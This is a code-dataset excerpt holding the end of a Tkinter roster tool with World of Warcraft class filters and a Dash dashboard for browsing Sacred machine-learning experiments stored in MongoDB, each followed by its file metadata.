Checkbutton(main_frame, text=\"Druid\",\r\n variable=filters[\"druid\"],\r\n bg=config[\"colors\"][\"druid\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nhunter_filter = Checkbutton(main_frame, text=\"Hunter\",\r\n variable=filters[\"hunter\"],\r\n bg=config[\"colors\"][\"hunter\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nmage_filter = Checkbutton(main_frame, text=\"Mage\",\r\n variable=filters[\"mage\"],\r\n bg=config[\"colors\"][\"mage\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\npaladin_filter = Checkbutton(main_frame, text=\"Paladin\",\r\n variable=filters[\"paladin\"],\r\n bg=config[\"colors\"][\"paladin\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\npriest_filter = Checkbutton(main_frame, text=\"Priest\",\r\n variable=filters[\"priest\"],\r\n bg=config[\"colors\"][\"priest\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nrogue_filter = Checkbutton(main_frame, text=\"Rogue\",\r\n variable=filters[\"rogue\"],\r\n bg=config[\"colors\"][\"rogue\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nshaman_filter = Checkbutton(main_frame, text=\"Shaman\",\r\n variable=filters[\"shaman\"],\r\n bg=config[\"colors\"][\"shaman\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nwarlock_filter = Checkbutton(main_frame, text=\"Warlock\",\r\n variable=filters[\"warlock\"],\r\n bg=config[\"colors\"][\"warlock\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nwarrior_filter = Checkbutton(main_frame, text=\"Warrior\",\r\n variable=filters[\"warrior\"],\r\n bg=config[\"colors\"][\"warrior\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\napply_filters = Button(main_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=refresh_tklists,\r\n text=\"Filter/Refresh\", width=25)\r\nmain_count_label = Label(main_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n text=f\"{config['trello']['main_live']}: 0\")\r\ntier_count_label = Label(main_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n text=f\"{config['trello']['tier_live']}: 0\")\r\n\r\n# Global List Frame\r\ncanvas.pack()\r\nglobal_label.pack()\r\nglobal_frame.pack()\r\nglobal_list.pack(fill=\"y\", side=\"left\")\r\ngl_scrollbar.pack(fill=\"y\", side=\"left\")\r\nlog_list.pack(side=\"left\", fill=\"y\")\r\nll_scrollbar.pack(side=\"left\", fill=\"y\")\r\ncreate_pl_button.pack(pady=5)\r\nadd_button.pack(pady=5)\r\nremove_button.pack(pady=5)\r\nmainsk_button.pack(pady=5)\r\ntiersk_button.pack(pady=5)\r\nundo_button.pack(pady=5)\r\nmerge_button.pack(pady=5)\r\n\r\n# Live Lists Frame\r\nlocal_label.pack()\r\nmain_frame.pack()\r\nmain_list.pack(side=\"left\", fill=\"y\")\r\nml_scrollbar.pack(side=\"left\", fill=\"y\")\r\ntier_list.pack(side=\"left\", fill=\"y\")\r\ntl_scrollbar.pack(side=\"left\", 
fill=\"y\")\r\ndruid_filter.pack(side=\"top\")\r\nhunter_filter.pack(side=\"top\")\r\nmage_filter.pack(side=\"top\")\r\npaladin_filter.pack(side=\"top\")\r\npriest_filter.pack(side=\"top\")\r\nrogue_filter.pack(side=\"top\")\r\nshaman_filter.pack(side=\"top\")\r\nwarlock_filter.pack(side=\"top\")\r\nwarrior_filter.pack(side=\"top\")\r\napply_filters.pack(pady=5)\r\nmain_count_label.pack()\r\ntier_count_label.pack()\r\n\r\n\r\n###############################################################################\r\n# Main logic\r\ndef main():\r\n refresh_tklists()\r\n window.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n main()\r\n except Exception as e:\r\n print(e)\r\n", "sub_path": "__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 34130, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 23, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 25, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "requests.request", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "2554185", "text": "# -*- coding: utf-8 -*-\nimport base64\nfrom glob import glob\n\nimport dash\nimport dash_table_experiments as dt\nfrom dash.dependencies import Input, Output\n\nfrom db_tools import *\nfrom utils import *\n\nclient = pymongo.MongoClient('drunk:27017')\napp = dash.Dash()\n\nexternal_css = [\n \"https://cdnjs.cloudflare.com/ajax/libs/normalize/7.0.0/normalize.min.css\", # Normalize the CSS\n \"https://fonts.googleapis.com/css?family=Open+Sans|Roboto\" # Fonts\n \"https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\",\n \"https://cdn.rawgit.com/xhlulu/0acba79000a3fd1e6f552ed82edb8a64/raw/dash_template.css\",\n \"https://rawgit.com/plotly/dash-live-model-training/master/custom_styles.css\"\n]\n\nfor css in external_css:\n app.css.append_css({\"external_url\": css})\n\ndbl = client.list_database_names()\ndatabase_list = []\nfor i in dbl:\n database_list.append({'label': i, 'value': i})\n\napp.layout = html.Div([\n html.H1(\"Sacred Database\",\n style={'display': 'inline',\n 'float': 'left',\n 'font-size': '2.65em',\n 'margin-left': '7px',\n 'font-weight': 'bolder',\n 'font-family': 'Product Sans',\n 'color': \"rgba(117, 117, 117, 0.95)\",\n 'margin-top': '20px',\n 'margin-bottom': '0'\n }\n ),\n\n dcc.Dropdown(\n id='database',\n options=database_list,\n value='arthur_exp_database',\n searchable=False,\n clearable=False,\n ),\n\n html.Div(id='output-container'),\n\n dcc.Dropdown(\n id='expe',\n placeholder=\"select a expe\",\n multi=True,\n clearable=True,\n ),\n\n dcc.Checklist(\n id='checklist',\n options=[\n {'label': 'Running', 'value': 'RUNNING'},\n {'label': 'Completed', 'value': 'COMPLETED'},\n {'label': 'Died', 'value': 'TIMEOUT'},\n {'label': 'Failed', 'value': 'FAILED'},\n {'label': 'Interrupted', 'value': 'INTERRUPTED'},\n {'label': 'Discriminator too small', 'value': 'DIS_TOO_SMALL'},\n {'label': 'Start Result too small', \"value\": \"START_RESULT_TOO_SMALL\"},\n ],\n values=['COMPLETED', 'RUNNING']\n ),\n html.Label('Max result'),\n html.Div(children=[\n html.Div(children=[\n dcc.Slider(\n id='range',\n min=0,\n max=5,\n step=0.01,\n value=1,\n marks={\n 0: {'label': '0', 'style': {'color': '#77b0b1'}},\n 0.05: {'label': '0.05', 'style': {'color': '#77b0b1'}},\n 0.1: {'label': '0.1', 'style': {'color': '#77b0b1'}},\n 0.25: {'label': '0.25'},\n 0.5: {'label': '0.5'},\n 1: {'label': '1'},\n 5: {'label': 'inf'},\n\n },\n\n )], style={'width': '75%', 'float': 'left', 'display': 'inline-block'}),\n html.Div(id='range_value', style={'width': '15%', 'float': 'right', 'display': 'inline-block'})\n ]),\n\n html.Div(\n children=[\n html.H4('Datatable '),\n dt.DataTable(\n # Initialise the rows\n rows=[{}],\n sortable=True,\n selected_row_indices=[],\n id='table')\n ], style={'marginBottom': 5, 'marginTop': 75}\n ),\n\n dcc.Tabs(id=\"tabs\", children=[\n dcc.Tab(label='Curve', children=[\n html.Div([\n html.Div([\n dcc.Dropdown(\n id='expe_list_curve',\n placeholder=\"select experiments\",\n multi=False,\n clearable=True,\n ),\n dcc.Dropdown(\n id='metric_list_curve',\n placeholder=\"select metrics\",\n multi=False,\n value='loss_MSE',\n clearable=True,\n ),\n ]),\n html.Div(id='run-log-storage', style={'display': 'none'}),\n div_graph('jojo')\n ])\n ]),\n dcc.Tab(label='Images', children=[\n html.Div([\n html.Div([\n dcc.Dropdown(\n id='expe_list_image',\n placeholder=\"select experiments\",\n multi=False,\n clearable=True,\n ),\n ]),\n dcc.RadioItems(id='train_or_test',\n options=[\n {'label':'Train', 'value': 'train'},\n 
{'label':'Test', 'value': 'test'}\n ], value='test'\n ),\n html.Div(children=[\n html.Div(children=[\n dcc.Slider(\n id='slider_img',\n min=0,\n max=100,\n step=1,\n value=1,\n marks={\n 0: {'label': '0', 'style': {'color': '#77b0b1'}},\n 25: {'label': '25', 'style': {'color': '#77b0b1'}},\n 50: {'label': '50'},\n 75: {'label': '75'},\n 100: {'label': '100'},\n },\n\n )], style={'width': '75%', 'float': 'left', 'display': 'inline-block'}),\n html.Div(id='img_number', style={'width': '15%', 'float': 'right', 'display': 'inline-block'})\n ]),\n html.Img(id=\"image_exp\")\n\n ])\n ]),\n dcc.Tab(label='Hyperparameters', children=[\n html.Div([\n dcc.RadioItems(\n id='float_or_box',\n options=[{'label': i, 'value': i} for i in ['scatter', 'box']],\n value='scatter'\n ),\n dcc.Dropdown(\n id='config',\n placeholder=\"select an hyperparameter\",\n # multi=True,\n clearable=True,\n ),\n html.Div(id='box-plot')\n ])\n ]),\n\n ], )\n\n], style={'marginBottom': 250, 'marginTop': 25, 'marginLeft': 15, 'marginRight': 15})\n\n\n@app.callback(\n Output('output-container', 'children'),\n [Input('database', 'value')])\ndef update_output(value):\n db = client[value]\n db_stat = db.command(\"dbstats\")\n retour = \"{} num_object : {} avgObjSize : {} datasize : {}\".format(\n db_stat['db'],\n db_stat['objects'],\n convert_size(db_stat['avgObjSize']),\n convert_size(db_stat['dataSize']),\n )\n return retour\n\n@app.callback(\n Output('expe', 'options'),\n [Input('database', 'value')])\ndef update_scrolldown(value):\n db = client[value]\n l = db.runs.distinct('experiment.name')\n c = []\n for i in l:\n c.append({'label': i, 'value': i})\n return c\n\n@app.callback(\n Output('range_value', 'children'),\n [Input('range', 'value')])\ndef range_value(value):\n return \"max : \" + str(value)\n\n\n@app.callback(Output('table', 'rows'),\n [Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value')])\ndef update_table(expe_name, value, completed, range_res):\n \"\"\"\n For user selections, return the relevant table\n \"\"\"\n db = client[value]\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n #if range_res < 5:\n # filtre['result'] = {}#'$lt': range_res}\n\n if expe_name is not None:\n if db.runs.find(filtre).count() == 0:\n df = pd.DataFrame({'_id': [00], 'result': [10000], 'start_time': ['2018-07-02 09:58:15.077000'], 'status': ['FAILED'], 'experiment.name': ['NO EXPERIMENT'], 'host.hostname': ['NONE']})\n\n return df.to_dict('records')\n\n # meters/loss_masked_MSE/test\n\n def get_metric(x, metrics_name, db):\n retour = 10000\n if \"info\" in x:\n\n metrics = x[\"info\"][\"metrics\"]\n df_dict = {}\n for k in metrics:\n for kk in db.metrics.find({'_id': ObjectId(k['id']), \"name\": metrics_name}):\n retour = np.min(kk[\"values\"])\n\n return retour, len(kk[\"values\"])\n\n def get_max_epoch(x, metrics_name, db):\n retour = 10000\n if \"info\" in x:\n\n metrics = x[\"info\"][\"metrics\"]\n df_dict = {}\n for k in metrics:\n for kk in db.metrics.find({'_id': ObjectId(k['id']), \"name\": metrics_name}):\n retour = np.min(kk[\"values\"])\n\n return len(kk[\"values\"])\n\n custom_cols = {\n 'max_epoch': lambda x: get_max_epoch(x, \"meters/loss_dis/train\", db), \n }\n # 'min_masked_mse': lambda x: get_metric(x, \"meters/loss_masked_MSE/test\", db),\n # 'min_masked_std': lambda x: get_metric(x, \"meters/loss_masked_std/test\", db),\n\n df = get_results(db.runs, project={'start_time': True,\n \"status\": True,\n 
\"host.hostname\": True,\n \"experiment.name\": True,\n \"info.exp_dir\": True,\n },\n filter_by=filtre, include_index=True, prune=False, custom_cols=custom_cols)\n else:\n df = pd.DataFrame({'A' : []})\n\n return df.to_dict('records')\n\n\n\n#\n# TAB HYPERPARAMATERS\n@app.callback(Output('config', 'options'),\n [\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value'),\n ])\ndef update_config_name(expe_name, value, completed, range_res):\n db = client[value]\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n filtre['result'] = {'$lt': range_res}\n l_hyper = []\n skip_cols = [\"config.device\", \"config.seed\", \"config.niter\", \"result\"]\n\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n df = get_results(db.runs, filter_by=filtre, include_index=True)\n\n for i in df.columns:\n\n if i in skip_cols:\n continue\n val = i[7:]\n l_hyper.append({'label': val, 'value': i}, )\n\n if len(l_hyper) == 0:\n l_hyper.append({'label': 'pas de hyper', value: 0})\n\n return l_hyper\n\n\n@app.callback(Output('box-plot', 'children'),\n [\n Input('config', 'value'),\n Input('float_or_box', 'value'),\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value')\n ])\ndef update_config_plot(box_value, float_or_box, expe_name, value, completed, range_res):\n db = client[value]\n\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n filtre['result'] = {'$lt': range_res}\n if expe_name is None:\n return\n if db.runs.find(filtre).count() == 0:\n return\n df = get_results(db.runs, filter_by=filtre, include_index=True)\n data = []\n if box_value is None:\n return \"Il n'y a rien a afficher pour l'instant\"\n\n if float_or_box == 'scatter':\n fig = float_to_scatter(df, box_value)\n else:\n df[box_value] = df[box_value].fillna(value='nan')\n df[box_value] = pd.Categorical(df[box_value])\n data += cat_to_boxplot(df, box_value)\n\n layout = go.Layout(\n title=\"Hyperparameter\"\n )\n fig = go.Figure(data=data, layout=layout)\n\n g = dcc.Graph(figure=fig, id='coco_lasticot')\n\n return g\n\n\n# # TAB CURVE\n@app.callback(Output('expe_list_curve', 'options'),\n [Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input(\"range\", 'value')])\ndef update_expe_list_curve(expe_name, value, completed, range_res):\n db = client[value]\n\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n if range_res < 5:\n filtre['result'] = {'$lt': range_res}\n l_retour = []\n\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n\n df = get_results(db.runs, filter_by=filtre, project={'start_time': True,\n \"status\": True,\n \"host.hostname\": True,\n \"experiment.name\": True\n }, include_index=True, prune=False)\n for row in df.iterrows():\n l_retour.append({'label': \"{}_{}_{}\".format(row[1][\"_id\"],\n row[1][\"result\"],\n row[1][\"experiment.name\"]),\n 'value': row[1][\"_id\"]})\n\n\n return sorted(l_retour, key=lambda k: k['label'].split('_')[1])\n\n\n\n@app.callback(Output('metric_list_curve', 'options'),\n [\n Input('expe_list_curve', 'value'),\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value')])\ndef update_metrics_list_curve(expe_id, expe_name, value, completed, range_res):\n db = client[value]\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = 
{'$in': completed}\n filtre['_id'] = expe_id\n list_metric_name = []\n\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n\n for l in db.runs.find(filtre):\n metrics = l['info']['metrics']\n\n for m in metrics:\n list_metric_name.append(m['name'].split('/')[1])\n list_metric_name = np.unique(list_metric_name)\n else:\n list_metric_name = ['no metrics']\n\n return [{'label': i, 'value':i} for i in list_metric_name]\n\n\n@app.callback(Output('run-log-storage', 'children'),\n [\n Input('expe_list_curve', 'value'),\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value'),])\ndef get_run_log(expe_id, expe_name, value, completed, range_res):\n db = client[value]\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n filtre['result'] = {'$lt': range_res}\n filtre['_id'] = expe_id\n json = ''\n if expe_name is not None:\n if db.runs.find(filtre).count() == 0:\n return\n\n for l in db.runs.find(filtre):\n metrics = l['info']['metrics']\n\n\n df_dict = {}\n for i in metrics:\n n = i['name']\n for kk in db.metrics.find({'_id': ObjectId(i['id'])}):\n v = kk['values']\n df_dict[n] = v\n df_dict['step'] = kk['steps']\n run_log_df = pd.DataFrame.from_dict(df_dict, orient='index')\n run_log_df = run_log_df.transpose()\n try:\n json = run_log_df.to_json(orient='split')\n except FileNotFoundError as error:\n print(error)\n print(\"Please verify if the csv file generated by your model is placed in the correct directory.\")\n return None\n\n return json\n\n\n@app.callback(Output('div-jojo-graph', 'children'),\n [Input('run-log-storage', 'children'),\n Input('radio-display-mode-jojo', 'value'),\n Input('checklist-smoothing-options-jojo', 'values'),\n Input('slider-smoothing-jojo', 'value'),\n Input('metric_list_curve', 'value')])\ndef update_accuracy_graph(log_storage, display_mode,\n checklist_smoothing_options,\n slider_smoothing,\n metric_name):\n\n graph = update_graph('accuracy-graph',\n metric_name,\n 'meters/'+metric_name+'/train',\n 'meters/'+metric_name+'/test',\n log_storage,\n display_mode,\n checklist_smoothing_options,\n slider_smoothing,\n metric_name)\n\n try:\n if display_mode in ['separate_horizontal', 'overlap']:\n graph.figure.layout.yaxis['range'] = [0, 1]\n else:\n graph.figure.layout.yaxis1['range'] = [0, 1]\n graph.figure.layout.yaxis2['range'] = [0, 1]\n\n except AttributeError:\n pass\n\n return [graph]\n#\n# # IMAGE TAB\n#\n#\n@app.callback(\n Output('img_number', 'children'),\n [Input('slider_img', 'value')])\ndef range_value(value):\n return \"img : \" + str(value)\n\n\n@app.callback(Output('expe_list_image', 'options'),\n [\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value')\n ])\ndef update_expe_list_image(expe_name, value, completed, range_res):\n db = client[value]\n\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n #if range_res < 5:\n # filtre['result'] = {'$lt': range_res}\n l_retour = []\n\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n\n df = get_results(db.runs, filter_by=filtre, project={'start_time': True,\n \"status\": True,\n \"host.hostname\": True,\n \"experiment.name\": True\n }, include_index=True, prune=False)\n for row in df.iterrows():\n l_retour.append({'label': \"{}_{}\".format(row[1][\"_id\"],\n #row[1][\"result\"],\n row[1][\"experiment.name\"]),\n 'value': row[1][\"_id\"]})\n\n\n return sorted(l_retour, key=lambda k: 
k['label'].split('_')[1])\n\n\n\n@app.callback(Output('slider_img', 'max'),\n              [\n                  Input('expe', 'value'),\n                  Input('database', 'value'),\n                  Input('checklist', 'values'),\n                  Input('range', 'value'),\n                  Input('expe_list_image', 'value'),\n                  Input('train_or_test', 'value')\n              ])\ndef update_image_slider(expe_name, value, completed, range_res, id, train_or_test):\n    if id is None:\n        return\n\n    db = client[value]\n    filtre = {'experiment.name': {'$in': expe_name}}\n    filtre['status'] = {'$in': completed}\n    #if range_res < 5:\n    #    filtre['result'] = {'$lt': range_res}\n    length = 0\n    if expe_name is not None:\n        if db.runs.find(filtre).count() > 0:\n            df = get_results(db.runs, filter_by=filtre, project={'start_time': True,\n                                                                 \"status\": True,\n                                                                 \"host.hostname\": True,\n                                                                 \"experiment.name\": True,\n                                                                 \"info.exp_dir\": True,\n                                                                 }, include_index=True,\n                             prune=False)#.sort_values('result')\n\n            folder = df[df['_id'] == id]['info.exp_dir'].values[0]\n            if folder is None:\n                return 0\n            if train_or_test == 'test':\n                length = len(glob(folder + \"/test*\"))\n                if length == 0:\n                    folder = folder.replace('big', 'gogos')\n                    length = len(glob(folder + \"/test*\"))\n\n            elif train_or_test == 'train':\n                length = len(glob(folder + \"/train*\"))\n                if length == 0:\n                    folder = folder.replace('big', 'gogos')\n                    length = len(glob(folder + \"/train*\"))\n\n            else:\n                length = 0\n\n    return length\n\n\n@app.callback(Output('image_exp', 'src'),\n              [\n                  Input('expe', 'value'),\n                  Input('database', 'value'),\n                  Input('checklist', 'values'),\n                  Input('range', 'value'),\n                  Input('expe_list_image', 'value'),\n                  Input('slider_img', 'value'),\n                  Input('train_or_test', 'value')\n              ])\ndef update_image(expe_name, value, completed, range_res, id, slider_num, train_or_test):\n\n    if id is None:\n        return\n\n    db = client[value]\n\n    filtre = {'experiment.name': {'$in': expe_name}}\n    filtre['status'] = {'$in': completed}\n    #if range_res < 5:\n    #    filtre['result'] = {'$lt': range_res}\n    if expe_name is not None:\n        if db.runs.find(filtre).count() > 0:\n            df = get_results(db.runs, filter_by=filtre, project={'start_time': True,\n                                                                 \"status\": True,\n                                                                 \"host.hostname\": True,\n                                                                 \"experiment.name\": True,\n                                                                 \"info.exp_dir\": True,\n                                                                 },\n                             include_index=True,\n                             prune=False)#.sort_values('result')\n\n            folder = df[df['_id'] == id]['info.exp_dir'].values[0]\n            if folder is None:\n                # the src property expects a string; an empty string clears the image\n                return ''\n            if train_or_test == 'test':\n                list_img = glob(folder + \"/test*\")\n                if len(list_img) == 0:\n                    folder = folder.replace('big', 'gogos')\n                    list_img = glob(folder + \"/test*\")\n\n            elif train_or_test == 'train':\n                list_img = glob(folder + \"/train*\")\n                if len(list_img) == 0:\n                    folder = folder.replace('big', 'gogos')\n                    list_img = glob(folder + \"/train*\")\n            else:\n                list_img = []\n\n            if len(list_img) > 0:\n                list_img = sorted_nicely(list_img)\n                encoded_image = base64.b64encode(open(list_img[slider_num], 'rb').read()).decode('utf-8').replace('\\n', '')\n                return 'data:image/png;base64,{}'.format(encoded_image)\n            else:\n                return ''\n        else:\n            return ''\n    else:\n        return ''\n\n\nif __name__ == '__main__':\n    app.run_server(debug=True, port=8052)\n", "sub_path": "app_ambient_gan_unconditional.py", "file_name": "app_ambient_gan_unconditional.py", "file_ext": "py", "file_size_in_byte": 23646, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "dash.Dash", "line_number": 13, "usage_type": 
"call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 102, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 195, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 196, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 209, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 210, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 220, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 221, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 226, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 227, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 228, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 229, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 230, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 295, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 297, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 298, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 299, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 300, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 327, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 329, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 330, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 331, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 332, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 333, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 334, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 369, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 370, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 371, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 372, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 373, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 402, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 404, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 405, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 406, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 407, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 408, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 431, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 433, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 434, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 435, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 436, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 437, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 472, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", 
"line_number": 473, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 474, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 475, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 476, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 477, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 509, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 510, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 515, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 517, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 518, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 519, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 520, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 583, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 586, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 589, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 592, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 550, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 552, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 553, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 554, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 555, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 556, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 557, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 636, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 637, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 640, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 641, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 645, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 646, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 649, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 650, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 656, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 600, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 602, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 603, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 604, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 605, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 606, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 607, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 608, "usage_type": "call"}]}
